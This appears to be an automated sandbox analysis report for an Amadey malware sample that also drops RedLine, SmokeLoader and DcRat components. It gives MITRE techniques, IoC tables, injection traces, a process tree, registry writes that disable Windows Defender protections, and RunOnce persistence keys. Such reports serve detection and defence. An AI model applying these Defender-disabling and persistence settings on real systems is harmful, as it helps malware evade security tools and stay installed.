amadey | c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	F263.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	F263.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	F263.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	F263.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	F263.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	F263.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral2/memory/2484-30-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/memory/208-53-0x00000000004C0000-0x000000000051A000-memory.dmp	family_redline
behavioral2/files/0x000600000002323f-154.dat	family_redline
behavioral2/files/0x000600000002323f-152.dat	family_redline
behavioral2/memory/1240-160-0x00000000004A0000-0x00000000004DE000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	F9A7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	FCD5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	oneetx.exe

Executes dropped EXE 19 IoCs

pid	Process
3748	D9D5.exe
2704	EC16.exe
1268	EF16.exe
4828	F263.exe
2132	F9A7.exe
4748	FCD5.exe
208	1158.exe
3188	tm1tk3Kp.exe
3360	nt7Jb4zG.exe
3892	ud1YI8tw.exe
4496	QF9Fh8LO.exe
3660	1kk23bd5.exe
3720	explothe.exe
1240	2eq139gc.exe
5956	oneetx.exe
5944	oneetx.exe
5936	explothe.exe
4612	oneetx.exe
5196	explothe.exe

Loads dropped DLL 1 IoCs

pid	Process
5336	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	F263.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	tm1tk3Kp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	nt7Jb4zG.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	ud1YI8tw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	QF9Fh8LO.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	D9D5.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3148 set thread context of 3204	3148	NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe	86
PID 2704 set thread context of 1032	2704	EC16.exe	104
PID 1268 set thread context of 2484	1268	EF16.exe	108
PID 3660 set thread context of 4612	3660	1kk23bd5.exe	125

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
4608	3148	WerFault.exe	84
1740	2704	WerFault.exe	101
4988	1268	WerFault.exe	106
2944	3660	WerFault.exe	123
2928	4612	WerFault.exe	125

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3340	schtasks.exe
6044	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3204	AppLaunch.exe
3204	AppLaunch.exe
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found
3168	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3168	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3204	AppLaunch.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeDebugPrivilege	4828	F263.exe
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeDebugPrivilege	208	1158.exe
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found
Token: SeShutdownPrivilege	3168	Process not Found
Token: SeCreatePagefilePrivilege	3168	Process not Found

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
4748	FCD5.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe
5044	msedge.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3168	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3148 wrote to memory of 3204	3148	NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe	86
PID 3148 wrote to memory of 3204	3148	NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe	86
PID 3148 wrote to memory of 3204	3148	NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe	86
PID 3148 wrote to memory of 3204	3148	NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe	86
PID 3148 wrote to memory of 3204	3148	NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe	86
PID 3148 wrote to memory of 3204	3148	NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe	86
PID 3168 wrote to memory of 3748	3168	Process not Found	100
PID 3168 wrote to memory of 3748	3168	Process not Found	100
PID 3168 wrote to memory of 3748	3168	Process not Found	100
PID 3168 wrote to memory of 2704	3168	Process not Found	101
PID 3168 wrote to memory of 2704	3168	Process not Found	101
PID 3168 wrote to memory of 2704	3168	Process not Found	101
PID 3168 wrote to memory of 3264	3168	Process not Found	102
PID 3168 wrote to memory of 3264	3168	Process not Found	102
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 2704 wrote to memory of 1032	2704	EC16.exe	104
PID 3168 wrote to memory of 1268	3168	Process not Found	106
PID 3168 wrote to memory of 1268	3168	Process not Found	106
PID 3168 wrote to memory of 1268	3168	Process not Found	106
PID 1268 wrote to memory of 2484	1268	EF16.exe	108
PID 1268 wrote to memory of 2484	1268	EF16.exe	108
PID 1268 wrote to memory of 2484	1268	EF16.exe	108
PID 1268 wrote to memory of 2484	1268	EF16.exe	108
PID 1268 wrote to memory of 2484	1268	EF16.exe	108
PID 1268 wrote to memory of 2484	1268	EF16.exe	108
PID 1268 wrote to memory of 2484	1268	EF16.exe	108
PID 1268 wrote to memory of 2484	1268	EF16.exe	108
PID 3168 wrote to memory of 4828	3168	Process not Found	111
PID 3168 wrote to memory of 4828	3168	Process not Found	111
PID 3168 wrote to memory of 2132	3168	Process not Found	113
PID 3168 wrote to memory of 2132	3168	Process not Found	113
PID 3168 wrote to memory of 2132	3168	Process not Found	113
PID 3168 wrote to memory of 4748	3168	Process not Found	114
PID 3168 wrote to memory of 4748	3168	Process not Found	114
PID 3168 wrote to memory of 4748	3168	Process not Found	114
PID 3168 wrote to memory of 208	3168	Process not Found	115
PID 3168 wrote to memory of 208	3168	Process not Found	115
PID 3168 wrote to memory of 208	3168	Process not Found	115
PID 3264 wrote to memory of 4856	3264	cmd.exe	117
PID 3264 wrote to memory of 4856	3264	cmd.exe	117
PID 3748 wrote to memory of 3188	3748	D9D5.exe	119
PID 3748 wrote to memory of 3188	3748	D9D5.exe	119
PID 3748 wrote to memory of 3188	3748	D9D5.exe	119
PID 3188 wrote to memory of 3360	3188	tm1tk3Kp.exe	120
PID 3188 wrote to memory of 3360	3188	tm1tk3Kp.exe	120
PID 3188 wrote to memory of 3360	3188	tm1tk3Kp.exe	120
PID 3360 wrote to memory of 3892	3360	nt7Jb4zG.exe	121
PID 3360 wrote to memory of 3892	3360	nt7Jb4zG.exe	121
PID 3360 wrote to memory of 3892	3360	nt7Jb4zG.exe	121
PID 3892 wrote to memory of 4496	3892	ud1YI8tw.exe	122
PID 3892 wrote to memory of 4496	3892	ud1YI8tw.exe	122
PID 3892 wrote to memory of 4496	3892	ud1YI8tw.exe	122
PID 4496 wrote to memory of 3660	4496	QF9Fh8LO.exe	123
PID 4496 wrote to memory of 3660	4496	QF9Fh8LO.exe	123
PID 4496 wrote to memory of 3660	4496	QF9Fh8LO.exe	123
PID 3264 wrote to memory of 5044	3264	cmd.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.c2e638f8e239ea633a371e0808a8c4c953f5c4160e7ed809d48cc305795b47e3_JC.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3148
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - DcRat
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3204
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 404
  2⤵
  - Program crash
  PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3148 -ip 3148
1⤵
PID:1504

C:\Users\Admin\AppData\Local\Temp\D9D5.exe
C:\Users\Admin\AppData\Local\Temp\D9D5.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tm1tk3Kp.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tm1tk3Kp.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3188
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nt7Jb4zG.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nt7Jb4zG.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ud1YI8tw.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ud1YI8tw.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:3892
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\QF9Fh8LO.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\QF9Fh8LO.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4496
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1kk23bd5.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1kk23bd5.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3660
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4612
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 544
        8⤵
        Program crash
        
        PID:2928
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3660 -s 600
        7⤵
        Program crash
        
        PID:2944
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2eq139gc.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2eq139gc.exe
        6⤵
        Executes dropped EXE
        
        PID:1240

C:\Users\Admin\AppData\Local\Temp\EC16.exe
C:\Users\Admin\AppData\Local\Temp\EC16.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:1032
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 388
  2⤵
  - Program crash
  PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EDBD.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
  2⤵
  PID:4856
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd036e46f8,0x7ffd036e4708,0x7ffd036e4718
    3⤵
    PID:932
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,15364445105213387603,17651610574506409943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
    3⤵
    PID:736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd036e46f8,0x7ffd036e4708,0x7ffd036e4718
    3⤵
    PID:1212
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
    3⤵
    PID:4924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
    3⤵
    PID:1900
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
    3⤵
    PID:224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
    3⤵
    PID:2248
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
    3⤵
    PID:3676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
    3⤵
    PID:4092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
    3⤵
    PID:4328
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
    3⤵
    PID:5192
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5828 /prefetch:8
    3⤵
    PID:5260
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5828 /prefetch:8
    3⤵
    PID:5408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
    3⤵
    PID:5488
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,16992271837517745640,12487429834652012642,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
    3⤵
